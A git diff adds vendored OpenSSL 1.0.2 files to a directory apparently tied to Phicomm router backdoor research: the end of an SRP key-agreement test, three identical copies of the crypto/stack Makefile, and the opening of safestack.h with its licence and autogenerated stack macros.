+    /* Client's key */
+    x = SRP_Calc_x(s, username, client_pass);
+    Kclient = SRP_Calc_client_key(GN->N, Bpub, GN->g, x, a, u);
+    showbn("Client's key", Kclient);
+
+    /* Server's key */
+    Kserver = SRP_Calc_server_key(Apub, v, u, b, GN->N);
+    showbn("Server's key", Kserver);
+
+    if (BN_cmp(Kclient, Kserver) == 0) {
+        ret = 0;
+    } else {
+        fprintf(stderr, "Keys mismatch\n");
+        ret = 1;
+    }
+
+    BN_clear_free(Kclient);
+    BN_clear_free(Kserver);
+    BN_clear_free(x);
+    BN_free(u);
+    BN_free(Apub);
+    BN_clear_free(a);
+    BN_free(Bpub);
+    BN_clear_free(b);
+    BN_free(s);
+    BN_clear_free(v);
+
+    return ret;
+}
+
+int main(int argc, char **argv)
+{
+    BIO *bio_err;
+    bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    CRYPTO_malloc_debug_init();
+    CRYPTO_dbg_set_options(V_CRYPTO_MDEBUG_ALL);
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    ERR_load_crypto_strings();
+
+    /* "Negative" test, expect a mismatch */
+    if (run_srp("alice", "password1", "password2") == 0) {
+        fprintf(stderr, "Mismatched SRP run failed\n");
+        return 1;
+    }
+
+    /* "Positive" test, should pass */
+    if (run_srp("alice", "password", "password") != 0) {
+        fprintf(stderr, "Plain SRP run failed\n");
+        return 1;
+    }
+
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+    ERR_free_strings();
+    CRYPTO_mem_leaks(bio_err);
+
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile
new file mode 100644
index 0000000..5327692
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile
@@ -0,0 +1,84 @@
+#
+# OpenSSL/crypto/stack/Makefile
+#
+
+DIR=	stack
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=stack.c
+LIBOBJ=stack.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= stack.h safestack.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+stack.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+stack.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+stack.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+stack.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+stack.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+stack.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+stack.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+stack.o: ../../include/openssl/symhacks.h ../cryptlib.h stack.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile.bak
new file mode 100644
index 0000000..5327692
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile.bak
@@ -0,0 +1,84 @@
+#
+# OpenSSL/crypto/stack/Makefile
+#
+
+DIR=	stack
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=stack.c
+LIBOBJ=stack.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= stack.h safestack.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+stack.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+stack.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+stack.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+stack.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+stack.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+stack.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+stack.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+stack.o: ../../include/openssl/symhacks.h ../cryptlib.h stack.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile.save
new file mode 100644
index 0000000..5327692
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/Makefile.save
@@ -0,0 +1,84 @@
+#
+# OpenSSL/crypto/stack/Makefile
+#
+
+DIR=	stack
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=stack.c
+LIBOBJ=stack.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= stack.h safestack.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+stack.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+stack.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+stack.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+stack.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+stack.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+stack.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+stack.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+stack.o: ../../include/openssl/symhacks.h ../cryptlib.h stack.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/safestack.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/safestack.h
new file mode 100644
index 0000000..1d4f87e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/stack/safestack.h
@@ -0,0 +1,2672 @@
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_SAFESTACK_H
+# define HEADER_SAFESTACK_H
+
+# include <openssl/stack.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# ifndef CHECKED_PTR_OF
+#  define CHECKED_PTR_OF(type, p) \
+    ((void*) (1 ? p : (type*)0))
+# endif
+
+/*
+ * In C++ we get problems because an explicit cast is needed from (void *) we
+ * use CHECKED_STACK_OF to ensure the correct type is passed in the macros
+ * below.
+ */
+
+# define CHECKED_STACK_OF(type, p) \
+    ((_STACK*) (1 ? p : (STACK_OF(type)*)0))
+
+# define CHECKED_SK_COPY_FUNC(type, p) \
+    ((void *(*)(void *)) ((1 ? p : (type *(*)(const type *))0)))
+
+# define CHECKED_SK_FREE_FUNC(type, p) \
+    ((void (*)(void *)) ((1 ? p : (void (*)(type *))0)))
+
+# define CHECKED_SK_CMP_FUNC(type, p) \
+    ((int (*)(const void *, const void *)) \
+        ((1 ? p : (int (*)(const type * const *, const type * const *))0)))
+
+# define STACK_OF(type) struct stack_st_##type
+# define PREDECLARE_STACK_OF(type) STACK_OF(type);
+
+# define DECLARE_STACK_OF(type) \
+STACK_OF(type) \
+    { \
+    _STACK stack; \
+    };
+# define DECLARE_SPECIAL_STACK_OF(type, type2) \
+STACK_OF(type) \
+    { \
+    _STACK stack; \
+    };
+
+/* nada (obsolete in new safestack approach)*/
+# define IMPLEMENT_STACK_OF(type)
+
+/*-
+ * Strings are special: normally an lhash entry will point to a single
+ * (somewhat) mutable object. In the case of strings:
+ *
+ * a) Instead of a single char, there is an array of chars, NUL-terminated.
+ * b) The string may have be immutable.
+ *
+ * So, they need their own declarations. Especially important for
+ * type-checking tools, such as Deputy.
+ *
+ * In practice, however, it appears to be hard to have a const
+ * string. For now, I'm settling for dealing with the fact it is a
+ * string at all.
+ */
+typedef char *OPENSSL_STRING;
+
+typedef const char *OPENSSL_CSTRING;
+
+/*
+ * Confusingly, LHASH_OF(STRING) deals with char ** throughout, but
+ * STACK_OF(STRING) is really more like STACK_OF(char), only, as mentioned
+ * above, instead of a single char each entry is a NUL-terminated array of
+ * chars. So, we have to implement STRING specially for STACK_OF. This is
+ * dealt with in the autogenerated macros below.
+ */
+
+DECLARE_SPECIAL_STACK_OF(OPENSSL_STRING, char)
+
+/*
+ * Similarly, we sometimes use a block of characters, NOT nul-terminated.
+ * These should also be distinguished from "normal" stacks.
+ */
+typedef void *OPENSSL_BLOCK;
+DECLARE_SPECIAL_STACK_OF(OPENSSL_BLOCK, void)
+
+/*
+ * SKM_sk_... stack macros are internal to safestack.h: never use them
+ * directly, use sk_<type>_... instead
+ */
+# define SKM_sk_new(type, cmp) \
+        ((STACK_OF(type) *)sk_new(CHECKED_SK_CMP_FUNC(type, cmp)))
+# define SKM_sk_new_null(type) \
+        ((STACK_OF(type) *)sk_new_null())
+# define SKM_sk_free(type, st) \
+        sk_free(CHECKED_STACK_OF(type, st))
+# define SKM_sk_num(type, st) \
+        sk_num(CHECKED_STACK_OF(type, st))
+# define SKM_sk_value(type, st,i) \
+        ((type *)sk_value(CHECKED_STACK_OF(type, st), i))
+# define SKM_sk_set(type, st,i,val) \
+        sk_set(CHECKED_STACK_OF(type, st), i, CHECKED_PTR_OF(type, val))
+# define SKM_sk_zero(type, st) \
+        sk_zero(CHECKED_STACK_OF(type, st))
+# define SKM_sk_push(type, st, val) \
+        sk_push(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
+# define SKM_sk_unshift(type, st, val) \
+        sk_unshift(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
+# define SKM_sk_find(type, st, val) \
+        sk_find(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
+# define SKM_sk_find_ex(type, st, val) \
+        sk_find_ex(CHECKED_STACK_OF(type, st), \
+                   CHECKED_PTR_OF(type, val))
+# define SKM_sk_delete(type, st, i) \
+        (type *)sk_delete(CHECKED_STACK_OF(type, st), i)
+# define SKM_sk_delete_ptr(type, st, ptr) \
+        (type *)sk_delete_ptr(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, ptr))
+# define SKM_sk_insert(type, st,val, i) \
+        sk_insert(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val), i)
+# define SKM_sk_set_cmp_func(type, st, cmp) \
+        ((int (*)(const type * const *,const type * const *)) \
+        sk_set_cmp_func(CHECKED_STACK_OF(type, st), CHECKED_SK_CMP_FUNC(type, cmp)))
+# define SKM_sk_dup(type, st) \
+        (STACK_OF(type) *)sk_dup(CHECKED_STACK_OF(type, st))
+# define SKM_sk_pop_free(type, st, free_func) \
+        sk_pop_free(CHECKED_STACK_OF(type, st), CHECKED_SK_FREE_FUNC(type, free_func))
+# define SKM_sk_deep_copy(type, st, copy_func, free_func) \
+        (STACK_OF(type) *)sk_deep_copy(CHECKED_STACK_OF(type, st), CHECKED_SK_COPY_FUNC(type, copy_func), CHECKED_SK_FREE_FUNC(type, free_func))
+# define SKM_sk_shift(type, st) \
+        (type *)sk_shift(CHECKED_STACK_OF(type, st))
+# define SKM_sk_pop(type, st) \
+        (type *)sk_pop(CHECKED_STACK_OF(type, st))
+# define SKM_sk_sort(type, st) \
+        sk_sort(CHECKED_STACK_OF(type, st))
+# define SKM_sk_is_sorted(type, st) \
+        sk_is_sorted(CHECKED_STACK_OF(type, st))
+# define SKM_ASN1_SET_OF_d2i(type, st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
+  (STACK_OF(type) *)d2i_ASN1_SET( \
+                                (STACK_OF(OPENSSL_BLOCK) **)CHECKED_PTR_OF(STACK_OF(type)*, st), \
+                                pp, length, \
+                                CHECKED_D2I_OF(type, d2i_func), \
+                                CHECKED_SK_FREE_FUNC(type, free_func), \
+                                ex_tag, ex_class)
+# define SKM_ASN1_SET_OF_i2d(type, st, pp, i2d_func, ex_tag, ex_class, is_set) \
+  i2d_ASN1_SET((STACK_OF(OPENSSL_BLOCK) *)CHECKED_STACK_OF(type, st), pp, \
+                                CHECKED_I2D_OF(type, i2d_func), \
+                                ex_tag, ex_class, is_set)
+# define SKM_ASN1_seq_pack(type, st, i2d_func, buf, len) \
+        ASN1_seq_pack(CHECKED_PTR_OF(STACK_OF(type), st), \
+                        CHECKED_I2D_OF(type, i2d_func), buf, len)
+# define SKM_ASN1_seq_unpack(type, buf, len, d2i_func, free_func) \
+        (STACK_OF(type) *)ASN1_seq_unpack(buf, len, CHECKED_D2I_OF(type, d2i_func), CHECKED_SK_FREE_FUNC(type, free_func))
+# define SKM_PKCS12_decrypt_d2i(type, algor, d2i_func, free_func, pass, passlen, oct, seq) \
+        (STACK_OF(type) *)PKCS12_decrypt_d2i(algor, \
+                                CHECKED_D2I_OF(type, d2i_func), \
+                                CHECKED_SK_FREE_FUNC(type, free_func), \
+                                pass, passlen, oct, seq)
+/*
+ * This block of defines is updated by util/mkstack.pl, please do not touch!
+ */
+# define sk_ACCESS_DESCRIPTION_new(cmp) SKM_sk_new(ACCESS_DESCRIPTION, (cmp))
+# define sk_ACCESS_DESCRIPTION_new_null() SKM_sk_new_null(ACCESS_DESCRIPTION)
+# define sk_ACCESS_DESCRIPTION_free(st) SKM_sk_free(ACCESS_DESCRIPTION, (st))
+# define sk_ACCESS_DESCRIPTION_num(st) SKM_sk_num(ACCESS_DESCRIPTION, (st))
+# define sk_ACCESS_DESCRIPTION_value(st, i) SKM_sk_value(ACCESS_DESCRIPTION, (st), (i))
+# define sk_ACCESS_DESCRIPTION_set(st, i, val) SKM_sk_set(ACCESS_DESCRIPTION, (st), (i), (val))
+# define sk_ACCESS_DESCRIPTION_zero(st) SKM_sk_zero(ACCESS_DESCRIPTION, (st))
+# define sk_ACCESS_DESCRIPTION_push(st, val) SKM_sk_push(ACCESS_DESCRIPTION, (st), (val))
+# define sk_ACCESS_DESCRIPTION_unshift(st, val) SKM_sk_unshift(ACCESS_DESCRIPTION, (st), (val))
+# define sk_ACCESS_DESCRIPTION_find(st, val) SKM_sk_find(ACCESS_DESCRIPTION, (st), (val))
+# define sk_ACCESS_DESCRIPTION_find_ex(st, val) SKM_sk_find_ex(ACCESS_DESCRIPTION, (st), (val))
+# define sk_ACCESS_DESCRIPTION_delete(st, i) SKM_sk_delete(ACCESS_DESCRIPTION, (st), (i))
+# define sk_ACCESS_DESCRIPTION_delete_ptr(st, ptr) SKM_sk_delete_ptr(ACCESS_DESCRIPTION, (st), (ptr))
+# define sk_ACCESS_DESCRIPTION_insert(st, val, i) SKM_sk_insert(ACCESS_DESCRIPTION, (st), (val), (i))
+# define sk_ACCESS_DESCRIPTION_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ACCESS_DESCRIPTION, (st), (cmp))
+# define sk_ACCESS_DESCRIPTION_dup(st) SKM_sk_dup(ACCESS_DESCRIPTION, st)
+# define sk_ACCESS_DESCRIPTION_pop_free(st, free_func) SKM_sk_pop_free(ACCESS_DESCRIPTION, (st), (free_func))
+# define sk_ACCESS_DESCRIPTION_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ACCESS_DESCRIPTION, (st), (copy_func), (free_func))
+# define sk_ACCESS_DESCRIPTION_shift(st) SKM_sk_shift(ACCESS_DESCRIPTION, (st))
+# define sk_ACCESS_DESCRIPTION_pop(st) SKM_sk_pop(ACCESS_DESCRIPTION, (st))
+# define sk_ACCESS_DESCRIPTION_sort(st) SKM_sk_sort(ACCESS_DESCRIPTION, (st))
+# define sk_ACCESS_DESCRIPTION_is_sorted(st) SKM_sk_is_sorted(ACCESS_DESCRIPTION, (st))
+# define sk_ASIdOrRange_new(cmp) SKM_sk_new(ASIdOrRange, (cmp))
+# define sk_ASIdOrRange_new_null() SKM_sk_new_null(ASIdOrRange)
+# define sk_ASIdOrRange_free(st) SKM_sk_free(ASIdOrRange, (st))
+# define sk_ASIdOrRange_num(st) SKM_sk_num(ASIdOrRange, (st))
+# define sk_ASIdOrRange_value(st, i) SKM_sk_value(ASIdOrRange, (st), (i))
+# define sk_ASIdOrRange_set(st, i, val) SKM_sk_set(ASIdOrRange, (st), (i), (val))
+# define sk_ASIdOrRange_zero(st) SKM_sk_zero(ASIdOrRange, (st))
+# define sk_ASIdOrRange_push(st, val) SKM_sk_push(ASIdOrRange, (st), (val))
+# define sk_ASIdOrRange_unshift(st, val) SKM_sk_unshift(ASIdOrRange, (st), (val))
+# define sk_ASIdOrRange_find(st, val) SKM_sk_find(ASIdOrRange, (st), (val))
+# define sk_ASIdOrRange_find_ex(st, val) SKM_sk_find_ex(ASIdOrRange, (st), (val))
+# define sk_ASIdOrRange_delete(st, i) SKM_sk_delete(ASIdOrRange, (st), (i))
+# define sk_ASIdOrRange_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASIdOrRange, (st), (ptr))
+# define sk_ASIdOrRange_insert(st, val, i) SKM_sk_insert(ASIdOrRange, (st), (val), (i))
+# define sk_ASIdOrRange_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASIdOrRange, (st), (cmp))
+# define sk_ASIdOrRange_dup(st) SKM_sk_dup(ASIdOrRange, st)
+# define sk_ASIdOrRange_pop_free(st, free_func) SKM_sk_pop_free(ASIdOrRange, (st), (free_func))
+# define sk_ASIdOrRange_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASIdOrRange, (st), (copy_func), (free_func))
+# define sk_ASIdOrRange_shift(st) SKM_sk_shift(ASIdOrRange, (st))
+# define sk_ASIdOrRange_pop(st) SKM_sk_pop(ASIdOrRange, (st))
+# define sk_ASIdOrRange_sort(st) SKM_sk_sort(ASIdOrRange, (st))
+# define sk_ASIdOrRange_is_sorted(st) SKM_sk_is_sorted(ASIdOrRange, (st))
+# define sk_ASN1_GENERALSTRING_new(cmp) SKM_sk_new(ASN1_GENERALSTRING, (cmp))
+# define sk_ASN1_GENERALSTRING_new_null() SKM_sk_new_null(ASN1_GENERALSTRING)
+# define sk_ASN1_GENERALSTRING_free(st) SKM_sk_free(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_GENERALSTRING_num(st) SKM_sk_num(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_GENERALSTRING_value(st, i) SKM_sk_value(ASN1_GENERALSTRING, (st), (i))
+# define sk_ASN1_GENERALSTRING_set(st, i, val) SKM_sk_set(ASN1_GENERALSTRING, (st), (i), (val))
+# define sk_ASN1_GENERALSTRING_zero(st) SKM_sk_zero(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_GENERALSTRING_push(st, val) SKM_sk_push(ASN1_GENERALSTRING, (st), (val))
+# define sk_ASN1_GENERALSTRING_unshift(st, val) SKM_sk_unshift(ASN1_GENERALSTRING, (st), (val))
+# define sk_ASN1_GENERALSTRING_find(st, val) SKM_sk_find(ASN1_GENERALSTRING, (st), (val))
+# define sk_ASN1_GENERALSTRING_find_ex(st, val) SKM_sk_find_ex(ASN1_GENERALSTRING, (st), (val))
+# define sk_ASN1_GENERALSTRING_delete(st, i) SKM_sk_delete(ASN1_GENERALSTRING, (st), (i))
+# define sk_ASN1_GENERALSTRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_GENERALSTRING, (st), (ptr))
+# define sk_ASN1_GENERALSTRING_insert(st, val, i) SKM_sk_insert(ASN1_GENERALSTRING, (st), (val), (i))
+# define sk_ASN1_GENERALSTRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASN1_GENERALSTRING, (st), (cmp))
+# define sk_ASN1_GENERALSTRING_dup(st) SKM_sk_dup(ASN1_GENERALSTRING, st)
+# define sk_ASN1_GENERALSTRING_pop_free(st, free_func) SKM_sk_pop_free(ASN1_GENERALSTRING, (st), (free_func))
+# define sk_ASN1_GENERALSTRING_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy(ASN1_GENERALSTRING, (st), (copy_func), (free_func))
+# define sk_ASN1_GENERALSTRING_shift(st) SKM_sk_shift(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_GENERALSTRING_pop(st) SKM_sk_pop(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_GENERALSTRING_sort(st) SKM_sk_sort(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_GENERALSTRING_is_sorted(st) SKM_sk_is_sorted(ASN1_GENERALSTRING, (st))
+# define sk_ASN1_INTEGER_new(cmp) SKM_sk_new(ASN1_INTEGER, (cmp))
+# define sk_ASN1_INTEGER_new_null() SKM_sk_new_null(ASN1_INTEGER)
+# define sk_ASN1_INTEGER_free(st) SKM_sk_free(ASN1_INTEGER, (st))
+# define sk_ASN1_INTEGER_num(st) SKM_sk_num(ASN1_INTEGER, (st))
+# define sk_ASN1_INTEGER_value(st, i) SKM_sk_value(ASN1_INTEGER, (st), (i))
+# define sk_ASN1_INTEGER_set(st, i, val) SKM_sk_set(ASN1_INTEGER, (st), (i), (val))
+# define sk_ASN1_INTEGER_zero(st) SKM_sk_zero(ASN1_INTEGER, (st))
+# define sk_ASN1_INTEGER_push(st, val) SKM_sk_push(ASN1_INTEGER, (st), (val))
+# define sk_ASN1_INTEGER_unshift(st, val) SKM_sk_unshift(ASN1_INTEGER, (st), (val))
+# define sk_ASN1_INTEGER_find(st, val) SKM_sk_find(ASN1_INTEGER, (st), (val))
+# define sk_ASN1_INTEGER_find_ex(st, val) SKM_sk_find_ex(ASN1_INTEGER, (st), (val))
+# define sk_ASN1_INTEGER_delete(st, i) SKM_sk_delete(ASN1_INTEGER, (st), (i))
+# define sk_ASN1_INTEGER_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASN1_INTEGER, (st), (ptr))
